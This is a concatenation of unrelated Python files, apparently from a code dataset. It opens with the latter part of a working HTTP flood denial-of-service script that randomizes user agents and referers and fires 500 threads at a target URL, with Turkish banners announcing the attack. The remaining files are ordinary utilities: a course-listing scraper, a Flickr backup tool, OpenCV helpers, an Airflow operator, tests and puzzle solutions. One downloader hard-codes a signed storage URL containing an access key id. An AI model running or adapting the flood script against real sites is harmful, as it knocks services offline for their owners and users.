headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'BU SCRIPT AEREN7318 TARAFINDAN GELISTIRILMISTIR.'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'site Allahına kavusuyor'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- aeren7318 Attack Finished --"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- aeren7318 Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('(https?\://)?([^/]*)/?.*', url)
# host = m.group(2)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
import time
#change my name to your username
driver_path = "/Users/giannaaprile/RUClassroom/chromedriver"
browser = webdriver.Chrome(driver_path)
f = open("fall2019.txt", "w+")
def moveInView(x):
browser.execute_script("arguments[0].scrollIntoView(true);",x)
browser.get("https://sis.rutgers.edu/soc/#subjects?semester=12019&campus=NB&level=U")
browser.implicitly_wait(5)
dropButton = browser.find_element_by_xpath("""//*[@id="widget_dijit_form_FilteringSelect_0"]/div[1]/input""")
dropButton.click()
dropMenu = browser.find_element_by_xpath("""//*[@id="dijit_form_FilteringSelect_0_popup"]""")
departments = [x for x in dropMenu.find_elements_by_css_selector(".dijitReset.dijitMenuItem")]
# Iterate through each department
count = 0
while count < len(departments):
time.sleep(1)
departments = [x for x in dropMenu.find_elements_by_css_selector(".dijitReset.dijitMenuItem")]
moveInView(departments[count])
departments[count].click()
time.sleep(5)
courseList = [x for x in browser.find_elements_by_css_selector(".courseExpandIcon")]
# Iterate through each class in the department
classCount = 0
while classCount < len(courseList):
# This can be shortened depending on wifi strength
time.sleep(1)
courseList = [x for x in browser.find_elements_by_css_selector(".courseExpandIcon")]
moveInView(courseList[classCount])
courseList[classCount].find_element(By.TAG_NAME, 'img').click()
# Gets each sections information
courseData = [x for x in browser.find_elements_by_css_selector(".courseData")]
sectionInfoList = [x for x in courseData[classCount].find_elements_by_css_selector(".sectionData")]
# Go through each section
sectionCount = 0
while sectionCount < len(sectionInfoList):
time.sleep(1)
courseData = [x for x in browser.find_elements_by_css_selector(".courseData")]
sectionInfoList = [x for x in courseData[classCount].find_elements_by_css_selector(".sectionData")]
moveInView(sectionInfoList[sectionCount])
classesPerWeek = len([x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeDay")])
# Print hours for class
meetingCount = 0
while meetingCount < classesPerWeek:
courseData = [x for x in browser.find_elements_by_css_selector(".courseData")]
sectionInfoList = [x for x in courseData[classCount].find_elements_by_css_selector(".sectionData")]
dayList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeDay")]
hourList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeHours")]
campusList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeCampus")]
buildingList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeBuildingAndRoom")]
print(dayList[meetingCount].text, hourList[meetingCount].text, campusList[meetingCount].text, buildingList[meetingCount].text)
newEntry = dayList[meetingCount].text + ' ' + hourList[meetingCount].text + ' ' + campusList[meetingCount].text + ' ' + buildingList[meetingCount].text + "\n"
f.write(newEntry)
meetingCount = meetingCount+1
sectionCount = sectionCount+1
# Close drop down to prevent loop
moveInView(courseList[classCount])
courseList[classCount].find_element(By.TAG_NAME, 'img').click()
classCount = classCount+1
dropButton.click()
count = count + 1
|
from sys import argv
script, input_file = argv
def print_all(f):
print f.read()
def rewind(f):
# moves to new file position in bytes (i.e. 0th byte)
# there is a second optional argument which dictates the mode of
# offset (the first argument). Default is offset from beginning of file
# but if second argument is 1: offset is relative to current position,
# and if second arg is 2: offset is relative to end of file
f.seek(0)
def print_a_line(line_count, f):
print line_count, f.readline(), # extra comma avoids adding a \n
current_file = open(input_file)
print "First let's print the whole file:\n"
print_all(current_file)
print "Now let's rewind, kind of like a tape."
rewind(current_file)
print "Let's print three lines:"
current_line = 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file,)
current_line += 1
print_a_line(current_line, current_file)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/30 14:47
# @Author : Jason
# @Site :
# @File : xmlparse.py
# @Software: PyCharm
import xml.etree.ElementTree as ET
import sys
import os.path
class XmlParse:
def __init__(self, file_path):
self.tree = None
self.root = None
self.xml_file_path = file_path
def ReadXml(self):
try:
print("xmlfile:", self.xml_file_path)
self.tree = ET.parse(self.xml_file_path)
self.root = self.tree.getroot()
except Exception as e:
print("parse xml faild!")
sys.exit()
else:
print("parse xml success!")
finally:
return self.tree
def CreateNode(self, tag, attrib, text):
element = ET.Element(tag, attrib)
element.text = text
print("tag:%s;attrib:%s;text:%s" % (tag, attrib, text))
return element
def AddNode(self, Parent, tag, attrib, text):
element = self.CreateNode(tag, attrib, text)
if Parent:
Parent.append(element)
el = self.root.find("lizhi")
print(el.tag, "----", el.attrib, "----", el.text)
else:
print("parent is none")
def WriteXml(self, destfile):
dest_xml_file = os.path.abspath(destfile)
self.tree.write(dest_xml_file, encoding="utf-8", xml_declaration=True)
if __name__ == "__main__":
xml_file = os.path.abspath("test.xml")
parse = XmlParse(xml_file)
tree = parse.ReadXml()
root = tree.getroot()
print(root)
parse.AddNode(root, "Python", {"age": "22", "hello": "world"}, "YES")
parse.WriteXml("testtest.xml")
|
from optparse import OptionParser
from ..util import defines
from ..old_extractors import features
from ..util import file_handling as fh
def main():
# Handle input options and arguments
usage = "%prog"
parser = OptionParser(usage=usage)
parser.add_option('-d', dest='dataset', default='',
help='Dataset to process; (if not specified, all files in raw data directory will be used)')
(options, args) = parser.parse_args()
if options.dataset != '':
input_dir = defines.data_raw_sents_dir
filename = fh.make_filename(input_dir, options.dataset, 'json')
files = [filename]
else:
input_dir = defines.data_raw_sents_dir
files = fh.ls(input_dir, '*.json')
print "Extracting ngram tokens:"
for f in files:
print f
output_dir = fh.makedirs(defines.data_token_dir, get_feature_name())
basename = fh.get_basename(f)
data = collect_semafor_pos_unifram_tokens(f)
output_filename = fh.make_filename(output_dir, basename, 'json')
fh.write_to_json(data, output_filename)
# write default function definition
features.make_feature_definition(get_feature_name(), filename=get_feature_name()+'_default',
min_doc_threshold=2, binarize=True)
def get_feature_name():
return 'frames'
def get_prefix():
return '_fr_'
def collect_semafor_pos_unifram_tokens(input_filename, prefix=''):
sent_index = fh.read_json(input_filename)
if prefix == '':
prefix = get_prefix()
basename = fh.get_basename(input_filename)
frames_filename = fh.make_filename(defines.data_semafor_dir, basename, 'fes')
frames = fh.read_text(frames_filename)
data = {}
values = set(sent_index.values())
for v in values:
data[v] = []
# read all sentences, except for the last (blank) line
for index, sent in enumerate(frames[:-1]):
print index, sent
parts = sent.split('\t')
frame = get_prefix() + parts[2]
sent = int(parts[6])
key = sent_index[sent]
data[key].append(frame)
return data
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# flickrbird.py
#
# Copyright 2010 Abhinay Omkar <abhiomkar AT gmail DOT com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; Version 3 of the License
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, the license can be downloaded here:
#
# http://www.gnu.org/licenses/gpl.html
# Meta
__version__ = '0.2'
__license__ = "GNU General Public License (GPL) Version 3"
__version_info__ = (0, 2)
__author__ = 'Abhinay Omkar <abhiomkar AT gmail DOT com>'
__maintainer__ = 'Tim Chan <tim AT timchan DOT com>'
#######################################################################################################################################################
# This script downloads Flickr User's public photos to current directory inside a folder denoted by the Flickr username you are trying to backup..
# Allows resuming download.
# Change the value of '_userFlickr' with the Flickr User's URL
# Change the value of '_photoSize' below
# Add your api_key and secret from your Flickr App Garden
#######################################################################################################################################################
import urllib, os, flickrapi
# Replace the below value with whatever URL of your Flickr photostream
_userFlickr = 'https://www.flickr.com/photos/photostreamhere'
# 's' small square 75x75
# 't' thumbnail, 100 on longest side
# 'm' small, 240 on longest side
# '' medium, 500 on longest side
# 'b' large, 1024 on longest side (only exists for very large original images)
# 'o' original image, either a jpg, gif or png, depending on source format (Pro Account Only)
_photoSize = 'o'
def main():
global _photoSize
api_key = ''
secret = ''
flickr = flickrapi.FlickrAPI(api_key, secret)
# Convert Flickr URL to User NSID and get their username
_userId = flickr.urls_lookupUser(url=_userFlickr).find('user').attrib['id']
peopleUsername = flickr.people_getInfo(user_id=_userId).find('person/username').text
print "--> Getting %s's photos" % peopleUsername
# Get all user's public photos
photos = []
#Get number of pages
numPages = flickr.people_getPublicPhotos(api_key=api_key, user_id = _userId, per_page = 500).find('photos').attrib['pages']
#Where there is more than 1 page of photos, go through each page to get them all
for i in range(1,int(numPages)+1):
print "--> Getting page %s" % (str(i))
publicPhotos = flickr.people_getPublicPhotos(api_key=api_key, user_id = _userId, per_page = 500, page = str(i))
for photo in publicPhotos.getiterator('photo'):
photos.append(photo.attrib['id'])
totalPhotos=len(photos)
#Create folder to house photos
folder = os.path.join(os.getcwd(), peopleUsername)
try:
os.makedirs(folder)
print "--> Created folder %s" % str(folder)
except OSError:
print "--> Using folder %s" % str(folder)
if not os.path.isdir(folder):
raise
# removing downloaded photos (log) from the download list (photos)
print "--> Loading previously downloaded photos."
flog = open(os.path.join(os.getcwd(),peopleUsername,'.'+_userId+'-photos'),'a+'); flog.seek(0); log = flog.read().split(';')
photos = set([p+_photoSize for p in photos])-set(log)
photos = [p.replace(_photoSize,'') for p in photos]
if totalPhotos-len(photos):
print "Skipping %s of %s photos. They are already downloaded." % (str(totalPhotos-len(photos)), str(totalPhotos))
if len(photos)!=0:
print "--> Started downloading %s photos" % str(len(photos))
print '>> You can suspend the download with ^C.'
# ok, start downloading photos one-by-one
for photo in photos:
photoTitle = flickr.photos_getInfo(photo_id=photo).find('photo/title').text or ''
photoSizesTag = flickr.photos_getSizes(photo_id=photo).findall('sizes/size')
photoSizes_list = [size.attrib['source'] for size in photoSizesTag]
photoSizes = {}
for size in photoSizes_list:
if size[-6:-4] == '_s':
photoSizes['square'] = size
elif size[-6:-4] == '_t':
photoSizes['thumbnail'] = size
elif size[-6:-4] == '_m':
photoSizes['small'] = size
elif size[-6:-4] == '_b':
photoSizes['large'] = size
elif size[-6:-4] == '_o':
photoSizes['original'] = size
else:
photoSizes['medium'] = size
# .jpg ?
photoType = photoSizes['square'][-4:]
_photoSize = _photoSize.strip()
if _photoSize == 's':
photoDownload = photoSizes['square']
elif _photoSize == 't':
photoDownload = photoSizes['thumbnail']
elif _photoSize == 'm' and photoSizes.has_key('small'):
photoDownload = photoSizes['small']
elif _photoSize == '' and photoSizes.has_key('medium'):
photoDownload = photoSizes['medium']
elif _photoSize == 'b' and photoSizes.has_key('large'):
photoDownload = photoSizes['large']
elif _photoSize == 'o':
if photoSizes.has_key('original'):
photoDownload = photoSizes['original']
elif photoSizes.has_key('large'):
photoDownload = photoSizes['large']
elif photoSizes.has_key('medium'):
photoDownload = photoSizes['medium']
elif photoSizes.has_key('small'):
photoDownload = photoSizes['small']
print "Downloading: %s" % photoTitle
# unix doesn't accept '/' in a file name, try $ touch 'foo/bar'
photoTitle = photoTitle.replace('/','_')
if photoTitle.startswith('.'):
# The filename which starts with '.' is a hidden file
photoTitle = photoTitle.replace('.', '_', 1)
if _photoSize:
photoSuffix = ''
else:
photoSuffix = '('+_photoSize+')'
# actually, downloading now...
urllib.urlretrieve(photoDownload, os.path.join(os.getcwd(), peopleUsername ,photoTitle+' '+str(photo)+' '+photoSuffix+photoType))
flog.write(photo+_photoSize+';')
if not peopleUsername:
# Some times the Flickr user doesn't have a real name, so...
peopleUsername = _userId
print "--> Downloaded %s photos of %s !" % (str(len(photos)), peopleUsername)
flog.close()
# You have some awesome photos
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print "\n <-- Run it again to resume download. Bye!"
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
from scipy.spatial import distance as dist
def show(imgs, h=8):
n = len(imgs)
if n == 1:
plt.figure(figsize=(h, 6), dpi=80)
plt.axis("off")
plt.imshow(cv2.cvtColor(imgs[0], cv2.COLOR_BGR2RGB))
return
f, axs = plt.subplots(1, n,figsize=(h,6*n))
for i in range(n):
axs[i].axis('off')
axs[i].imshow(cv2.cvtColor(imgs[i], cv2.COLOR_BGR2RGB))
def annotate_points(img, points):
mask_temp = img.copy()
for c in points:
c = np.array(c).flatten().astype(int)
mask_temp = cv2.circle(mask_temp, tuple(c), 8, (0,255,0), thickness=3)
show([mask_temp])
def white_balance(img):
result = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
avg_a = np.average(result[:, :, 1])
avg_b = np.average(result[:, :, 2])
result[:, :, 1] = result[:, :, 1] - ((avg_a - 128) * (result[:, :, 0] / 255.0) * 1.1)
result[:, :, 2] = result[:, :, 2] - ((avg_b - 128) * (result[:, :, 0] / 255.0) * 1.1)
result = cv2.cvtColor(result, cv2.COLOR_LAB2BGR)
return result
def clockwise_corners(pts):
pts = np.array(pts.copy())
xSorted = pts[np.argsort(pts[:, 0]), :]
leftMost = xSorted[:2, :]
rightMost = xSorted[2:, :]
leftMost = leftMost[np.argsort(leftMost[:, 1]), :]
(tl, bl) = leftMost
D = dist.cdist(tl[np.newaxis], rightMost, "euclidean")[0]
(br, tr) = rightMost[np.argsort(D)[::-1], :]
return np.array([tl, tr, br, bl])
def warpBox(image,
box,
target_height=None,
target_width=None,
return_transform=False):
"""Warp a boxed region in an image given by a set of four points into
a rectangle with a specified width and height. Useful for taking crops
of distorted or rotated text.
Args:
image: The image from which to take the box
box: A list of four points starting in the top left
corner and moving clockwise.
target_height: The height of the output rectangle
target_width: The width of the output rectangle
return_transform: Whether to return the transformation
matrix with the image.
"""
box = np.float32(clockwise_corners(box))
w, h = image.shape[1], image.shape[0]
assert (
(target_width is None and target_height is None)
or (target_width is not None and target_height is not None)), \
'Either both or neither of target width and height must be provided.'
if target_width is None and target_height is None:
target_width = w
target_height = h
M = cv2.getPerspectiveTransform(src=box, dst=np.array([[0, 0], [target_width, 0], [target_width, target_height], [0, target_height]]).astype('float32'))
full = cv2.warpPerspective(image, M, dsize=(int(target_width), int(target_height)))
if return_transform:
return full, M
return full
|
"""PDF Credentials API v2 views."""
import os
from django.utils.translation import gettext as _
from django.http import HttpResponse
from rest_framework import permissions
from rest_framework.views import APIView
from modoboa.admin.models import Domain
from modoboa.lib.throttle import UserLesserDdosUser
from .serializers import GetAccountCredentialsSerializer
from ...lib import rfc_6266_content_disposition
class PDFCredentialView(APIView):
permission_classes = (
permissions.IsAuthenticated, permissions.DjangoModelPermissions,
)
serializer_class = GetAccountCredentialsSerializer
throttle_classes = [UserLesserDdosUser]
def get_queryset(self):
"""Filter queryset based on current user."""
return Domain.objects.get_for_admin(self.request.user)
def get(self, request, *args, **kwargs):
"""View to download a document."""
data = {"account_id": kwargs["account_id"]}
serializer = GetAccountCredentialsSerializer(
data=data, context={'request': request})
serializer.is_valid(raise_exception=True)
serializer.save()
content = serializer.context["content"]
fname = serializer.context["fname"]
resp = HttpResponse(content)
resp["Content-Type"] = "application/pdf"
resp["Content-Length"] = len(content)
resp["Content-Disposition"] = rfc_6266_content_disposition(fname)
return resp
|
from airflow.contrib.hooks.aws_hook import AwsHook
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class StageToRedshiftOperator(BaseOperator):
ui_color = '#f8a5c2'
ui_fgcolor = '#000000'
template_fields = ("s3_src_pattern",)
@apply_defaults
def __init__(
self,
# conexiones
redshift_conn='',
aws_credentials='',
table='',
s3_src_bucket='',
s3_src_pattern='',
data_format='json',
delimiter=',',
jsonpaths='auto',
ignore_header=0,
*args, **kwargs):
super(StageToRedshiftOperator,self).__init__(*args, **kwargs)
self.redshift_conn = redshift_conn
self.aws_credentials = aws_credentials
self.table = table
self.s3_src_bucket = s3_src_bucket
self.s3_src_pattern = s3_src_pattern
self.data_format = data_format
self.delimiter = delimiter
self.jsonpaths = jsonpaths
self.ignore_header = ignore_header
self.json_copy_sql = """
COPY {}
FROM '{}'
ACCESS_KEY_ID '{}'
SECRET_ACCESS_KEY '{}'
JSON '{}'
COMPUPDATE OFF
"""
self.csv_copy_sql = """
COPY {}
FROM '{}'
ACCESS_KEY_ID '{}'
SECRET_ACCESS_KEY '{}'
IGNOREHEADER {}
DELIMITER '{}'
"""
def execute(self,context):
aws_hook = AwsHook(self.aws_credentials)
credentials = aws_hook.get_credentials()
redshift = PostgresHook(postgres_conn_id=self.redshift_conn)
self.log.info("****************************************")
self.log.info("Copying data from S3 to Redshift...")
rendered_key = self.s3_src_pattern.format(**context)
s3_path = "s3://{}/{}".format(self.s3_src_bucket, rendered_key)
if self.data_format == "json":
formatted_sql = self.json_copy_sql.format(
self.table, # COPY
s3_path, # FROM
credentials.access_key, # ACCESS_KEY_ID
credentials.secret_key, # SECRET_ACCESS_KEY
self.jsonpaths # JSON
)
redshift.run(formatted_sql)
if self.data_format == "csv":
formatted_sql = self.csv_copy_sql.format(
self.table, # COPY
s3_path, # FROM
credentials.access_key, # ACCESS_KEY_ID
credentials.secret_key, # SECRET_ACCESS_KEY
self.ignore_headers, # IGNOREHEADER
self.delimiter # DELIMITER
)
redshift.run(formatted_sql)
self.log.info("Finished copying data from S3 to Redshift")
self.log.info("****************************************")
|
from __future__ import division, print_function
import mock
import unittest
from smqtk.representation import DataSet
class DummyDataSet (DataSet):
@classmethod
def is_usable(cls):
return True
def __init__(self):
super(DummyDataSet, self).__init__()
def __iter__(self):
pass
def count(self):
pass
def uuids(self):
pass
def has_uuid(self, uuid):
pass
def add_data(self, *elems):
pass
def get_data(self, uuid):
pass
def get_config(self):
return {}
class TestDataSetAbstract (unittest.TestCase):
def test_len(self):
expected_len = 134623456
ds = DummyDataSet()
ds.count = mock.MagicMock(return_value=expected_len)
self.assertEqual(len(ds), expected_len)
def test_getitem_mock(self):
expected_key = 'foo'
expected_value = 'bar'
def expected_effect(k):
if k == expected_key:
return expected_value
raise RuntimeError("not expected key")
ds = DummyDataSet()
ds.get_data = mock.MagicMock(side_effect=expected_effect)
self.assertRaisesRegexp(
RuntimeError,
"^not expected key$",
ds.__getitem__, 'unexpectedKey'
)
self.assertEqual(ds[expected_key], expected_value)
def test_contains(self):
# Contains built-in hook expects data element and requests UUID from
# that.
expected_uuid = 'some uuid'
mock_data_element = mock.MagicMock()
mock_data_element.uuid = mock.MagicMock(return_value=expected_uuid)
def expected_has_uuid_effect(k):
if k == expected_uuid:
return True
return False
ds = DummyDataSet()
ds.has_uuid = mock.MagicMock(side_effect=expected_has_uuid_effect)
self.assertTrue(mock_data_element in ds)
ds.has_uuid.assert_called_once_with(expected_uuid)
mock_data_element.uuid.return_value = 'not expected uuid'
self.assertFalse(mock_data_element in ds)
|
from django.contrib import admin
from .models import Profiles
admin.site.register(Profiles)
|
from collections import Counter
from argparse import ArgumentParser
from sys import argv
def read_text_from_file(filepath):
with open(filepath) as text_file:
return text_file.read()
def remove_nonalpha_chars(text, ignore_list=[]):
filtered_list = [char for char in list(text) if char.isalpha() or char in ignore_list]
filtered_text = ''.join(filtered_list)
return filtered_text
def get_most_frequent_words(text, top_counter):
filtered_text = remove_nonalpha_chars(text, [' ', '\n'])
words = filtered_text.lower().split()
common_words_info = Counter(words).most_common(top_counter)
common_words = [word for word, _ in common_words_info]
return common_words
def parse_args(argv):
parser = ArgumentParser()
parser.add_argument(
'filepath',
type=str,
help='File containing the text'
)
parser.add_argument(
'--top',
type=int,
default=10,
help='A number of most common words to display'
)
return parser.parse_args(argv)
if __name__ == '__main__':
args = parse_args(argv[1:])
text = read_text_from_file(args.filepath)
most_common_words = get_most_frequent_words(text, args.top)
print(' '.join(most_common_words))
|
file = "Day7/inputnaomi.txt"
from itertools import permutations
with open(file,'r') as f:
initial_intcode = list(map(int,f.read().split(',')))
f.close()
def get_param(pos_mode,number,ic):
if pos_mode:
return ic[number]
return number
def advance_intcode(inputs,ip,intcode,get_phase=True):
in_index=0
while intcode[ip]!=99:
instruction=("0000"+str(intcode[ip]))[-5:]
p1, p2, p3 = [instruction[2-i]=="0" for i in range(3)]
op=instruction[3:]
# print(op)
if op=="01":
intcode[intcode[ip+3]]=get_param(p1,intcode[ip+1],intcode)+get_param(p2,intcode[ip+2],intcode)
ip = ip+4
elif op=="02":
intcode[intcode[ip+3]]=get_param(p1,intcode[ip+1],intcode)*get_param(p2,intcode[ip+2],intcode)
ip = ip+4
elif op=="03":
if get_phase:
intcode[intcode[ip+1]]=inputs[0]
get_phase=False
else:
intcode[intcode[ip+1]]=inputs[1]
ip = ip+2
elif op=="04":
return get_param(p1,intcode[ip+1],intcode), intcode, ip+2
elif op=="05":
if get_param(p1,intcode[ip+1],intcode)!=0:
ip=get_param(p2,intcode[ip+2],intcode)
else:
ip = ip+3
elif op=="06":
if get_param(p1,intcode[ip+1],intcode)==0:
ip=get_param(p2,intcode[ip+2],intcode)
else:
ip = ip+3
elif op=="07":
if get_param(p1,intcode[ip+1],intcode)<get_param(p2,intcode[ip+2],intcode):
intcode[intcode[ip+3]]=1
ip=ip+4
else:
intcode[intcode[ip+3]]=0
ip=ip+4
elif op=="08":
if get_param(p1,intcode[ip+1],intcode)==get_param(p2,intcode[ip+2],intcode):
intcode[intcode[ip+3]]=1
ip=ip+4
else:
intcode[intcode[ip+3]]=0
ip=ip+4
else:
print('error: instruction reads '+instruction)
break
return None, intcode, ip
def get_signal(config):
signal=0
for index in range(5):
signal=advance_intcode([config[index],signal],0,[val for val in initial_intcode])[0]
return signal
orders = list(permutations(range(5)))
max_signal=0
for order in orders:
signal=get_signal(order)
if signal>max_signal:
max_signal=signal
print("Part 1: "+str(max_signal))
# Part 2
class Amp:
def __init__(self,phase):
self.ic=[val for val in initial_intcode]
self.ip=0
self.phase=phase
self.input=[phase,0]
self.first_run=True
def __str__(self):
return "Amp "+str(self.phase)
def advance(self):
self.output, self.ic, self.ip = advance_intcode(self.input,self.ip,self.ic,self.first_run)
self.first_run=False
def get_signal_2(config):
amps = [Amp(c) for c in config]
signal=0
i=0
loop=0
while True:
amps[i%5].advance()
if amps[i%5].output is None:
break
signal=amps[i%5].output
amps[(i+1)%5].input[1]=signal
i +=1
loop+=1
del amps
return signal
orders = list(permutations(range(5,10)))
max_signal=0
for order in orders:
signal=get_signal_2(order)
if signal>max_signal:
max_signal=signal
print("Part 2: "+str(max_signal))
|
import requests
# 读取的文件目录
reader_file = "/Users/yanmeng/Downloads/test.txt"
# 存放的文件夹路径
output_dictionary = "/Users/yanmeng/Downloads/chenzijuan/"
def download(url,index):
r = requests.get(url)
with open(output_dictionary+str(index)+str(url.split('?')[0].split('/')[-1]), "wb") as code:
code.write(r.content)
code.close()
# f = open(reader_file)
# lines = f.readlines()
# index = 0;
# for line in lines:
# index = index+1
# line = line.replace('\n','',1)
# print(line)
# download(line, index)
# f.close()
download("http://101.201.177.119/dlcdc/space/gpfs01/sdb/sdb_files/datasets/SURF_CLI_CHN_MUL_DAY_V3.0/datasets/TEM/SURF_CLI_CHN_MUL_DAY-TEM-12001-200506.TXT?Expires=1517978555&OSSAccessKeyId=CcULE6lAfEbIFtKD&Signature=8OpHUv1labPEv5UN2j9i2rIT28A%3D",239)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.